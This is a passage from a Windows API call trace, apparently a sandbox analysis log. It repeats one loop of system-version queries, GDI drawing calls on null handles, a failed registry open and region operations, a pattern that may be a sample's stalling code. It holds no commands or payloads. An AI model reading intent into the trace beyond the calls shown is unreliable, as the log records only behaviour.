dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.534] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.534] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.534] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.534] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.534] BeginPath (hdc=0x0) returned 0 [0017.534] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.534] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.534] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.534] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.534] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.534] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.534] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.534] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.534] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1504027d [0017.535] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1f040713 [0017.535] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a15 [0017.535] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a16 [0017.535] CombineRgn (hrgnDst=0x1040a15, hrgnSrc1=0x1504027d, hrgnSrc2=0x1f040713, iMode=1) returned 1 [0017.535] CombineRgn (hrgnDst=0x1040a16, hrgnSrc1=0x1504027d, hrgnSrc2=0x1f040713, iMode=4) returned 2 [0017.535] CreateSolidBrush (color=0xff) returned 0x2100a14 [0017.535] CreateSolidBrush (color=0xff0000) returned 0x1100a17 [0017.535] DeleteObject (ho=0x1100a17) returned 1 [0017.535] DeleteObject (ho=0x1f040713) returned 1 [0017.535] DeleteObject (ho=0x1504027d) returned 1 [0017.535] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.535] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.535] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.535] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.535] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.535] BeginPath (hdc=0x0) returned 0 [0017.535] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.535] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.535] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.535] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.535] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.535] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.535] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.535] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.535] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x20040713 [0017.535] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1604027d [0017.535] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a18 [0017.535] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a19 [0017.535] CombineRgn (hrgnDst=0x1040a18, hrgnSrc1=0x20040713, hrgnSrc2=0x1604027d, iMode=1) returned 1 [0017.536] CombineRgn (hrgnDst=0x1040a19, hrgnSrc1=0x20040713, hrgnSrc2=0x1604027d, iMode=4) returned 2 [0017.536] CreateSolidBrush (color=0xff) returned 0x2100a17 [0017.536] CreateSolidBrush (color=0xff0000) returned 0x1100a1a [0017.536] DeleteObject (ho=0x1100a1a) returned 1 [0017.536] DeleteObject (ho=0x1604027d) returned 1 [0017.536] DeleteObject (ho=0x20040713) returned 1 [0017.536] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.536] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.536] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.536] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.536] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.536] BeginPath (hdc=0x0) returned 0 [0017.536] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.536] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.536] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.536] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.536] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.536] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.536] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.536] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.536] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1704027d [0017.536] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x21040713 [0017.536] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a1b [0017.536] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a1c [0017.536] CombineRgn (hrgnDst=0x1040a1b, hrgnSrc1=0x1704027d, hrgnSrc2=0x21040713, iMode=1) returned 1 [0017.536] CombineRgn (hrgnDst=0x1040a1c, hrgnSrc1=0x1704027d, hrgnSrc2=0x21040713, iMode=4) returned 2 [0017.536] CreateSolidBrush (color=0xff) returned 0x2100a1a [0017.536] CreateSolidBrush (color=0xff0000) returned 0x1100a1d [0017.537] DeleteObject (ho=0x1100a1d) returned 1 [0017.537] DeleteObject (ho=0x21040713) returned 1 [0017.537] DeleteObject (ho=0x1704027d) returned 1 [0017.537] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.537] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.537] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.537] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.537] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.537] BeginPath (hdc=0x0) returned 0 [0017.537] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.537] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.537] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.537] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.537] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.537] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.537] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.537] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.537] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x22040713 [0017.537] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1804027d [0017.537] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a1e [0017.537] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a1f [0017.537] CombineRgn (hrgnDst=0x1040a1e, hrgnSrc1=0x22040713, hrgnSrc2=0x1804027d, iMode=1) returned 1 [0017.537] CombineRgn (hrgnDst=0x1040a1f, hrgnSrc1=0x22040713, hrgnSrc2=0x1804027d, iMode=4) returned 2 [0017.537] CreateSolidBrush (color=0xff) returned 0x2100a1d [0017.537] CreateSolidBrush (color=0xff0000) returned 0x1100a20 [0017.537] DeleteObject (ho=0x1100a20) returned 1 [0017.537] DeleteObject (ho=0x1804027d) returned 1 [0017.537] DeleteObject (ho=0x22040713) returned 1 [0017.537] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.537] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.538] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.538] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.538] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.538] BeginPath (hdc=0x0) returned 0 [0017.538] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.538] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.538] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.538] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.538] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.538] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.538] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.538] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.538] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1904027d [0017.538] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x23040713 [0017.538] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a21 [0017.538] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a22 [0017.538] CombineRgn (hrgnDst=0x1040a21, hrgnSrc1=0x1904027d, hrgnSrc2=0x23040713, iMode=1) returned 1 [0017.538] CombineRgn (hrgnDst=0x1040a22, hrgnSrc1=0x1904027d, hrgnSrc2=0x23040713, iMode=4) returned 2 [0017.538] CreateSolidBrush (color=0xff) returned 0x2100a20 [0017.538] CreateSolidBrush (color=0xff0000) returned 0x1100a23 [0017.538] DeleteObject (ho=0x1100a23) returned 1 [0017.538] DeleteObject (ho=0x23040713) returned 1 [0017.538] DeleteObject (ho=0x1904027d) returned 1 [0017.538] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.538] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.538] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.538] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.538] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.538] BeginPath (hdc=0x0) returned 0 [0017.538] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.538] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.538] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.538] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.539] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.539] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.539] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.539] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.539] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x24040713 [0017.539] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1a04027d [0017.539] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a24 [0017.539] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a25 [0017.539] CombineRgn (hrgnDst=0x1040a24, hrgnSrc1=0x24040713, hrgnSrc2=0x1a04027d, iMode=1) returned 1 [0017.539] CombineRgn (hrgnDst=0x1040a25, hrgnSrc1=0x24040713, hrgnSrc2=0x1a04027d, iMode=4) returned 2 [0017.539] CreateSolidBrush (color=0xff) returned 0x2100a23 [0017.539] CreateSolidBrush (color=0xff0000) returned 0x1100a26 [0017.539] DeleteObject (ho=0x1100a26) returned 1 [0017.539] DeleteObject (ho=0x1a04027d) returned 1 [0017.539] DeleteObject (ho=0x24040713) returned 1 [0017.539] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.539] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.539] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.539] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.539] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.539] BeginPath (hdc=0x0) returned 0 [0017.539] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.539] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.539] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.539] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.539] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.539] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.539] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.540] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.540] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1b04027d [0017.540] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x25040713 [0017.540] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a27 [0017.540] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a28 [0017.540] CombineRgn (hrgnDst=0x1040a27, hrgnSrc1=0x1b04027d, hrgnSrc2=0x25040713, iMode=1) returned 1 [0017.540] CombineRgn (hrgnDst=0x1040a28, hrgnSrc1=0x1b04027d, hrgnSrc2=0x25040713, iMode=4) returned 2 [0017.540] CreateSolidBrush (color=0xff) returned 0x2100a26 [0017.540] CreateSolidBrush (color=0xff0000) returned 0x1100a29 [0017.540] DeleteObject (ho=0x1100a29) returned 1 [0017.540] DeleteObject (ho=0x25040713) returned 1 [0017.540] DeleteObject (ho=0x1b04027d) returned 1 [0017.540] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.540] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.540] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.540] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.540] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.540] BeginPath (hdc=0x0) returned 0 [0017.540] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.540] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.540] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.540] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.540] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.540] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.540] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.540] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.541] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x26040713 [0017.541] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1c04027d [0017.541] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a2a [0017.541] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a2b [0017.541] CombineRgn (hrgnDst=0x1040a2a, hrgnSrc1=0x26040713, hrgnSrc2=0x1c04027d, iMode=1) returned 1 [0017.541] CombineRgn (hrgnDst=0x1040a2b, hrgnSrc1=0x26040713, hrgnSrc2=0x1c04027d, iMode=4) returned 2 [0017.541] CreateSolidBrush (color=0xff) returned 0x2100a29 [0017.541] CreateSolidBrush (color=0xff0000) returned 0x1100a2c [0017.541] DeleteObject (ho=0x1100a2c) returned 1 [0017.541] DeleteObject (ho=0x1c04027d) returned 1 [0017.541] DeleteObject (ho=0x26040713) returned 1 [0017.541] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.541] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.541] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.541] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.541] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.541] BeginPath (hdc=0x0) returned 0 [0017.541] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.541] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.541] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.541] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.541] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.541] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.541] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.541] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.541] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1d04027d [0017.541] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x27040713 [0017.541] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a2d [0017.541] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a2e [0017.541] CombineRgn (hrgnDst=0x1040a2d, hrgnSrc1=0x1d04027d, hrgnSrc2=0x27040713, iMode=1) returned 1 [0017.541] CombineRgn (hrgnDst=0x1040a2e, hrgnSrc1=0x1d04027d, hrgnSrc2=0x27040713, iMode=4) returned 2 [0017.541] CreateSolidBrush (color=0xff) returned 0x2100a2c [0017.542] CreateSolidBrush (color=0xff0000) returned 0x1100a2f [0017.542] DeleteObject (ho=0x1100a2f) returned 1 [0017.542] DeleteObject (ho=0x27040713) returned 1 [0017.542] DeleteObject (ho=0x1d04027d) returned 1 [0017.542] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.542] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.542] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.542] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.542] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.542] BeginPath (hdc=0x0) returned 0 [0017.542] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.542] AngleArc (hdc=0x0, x=0, y=0, r=0x32, 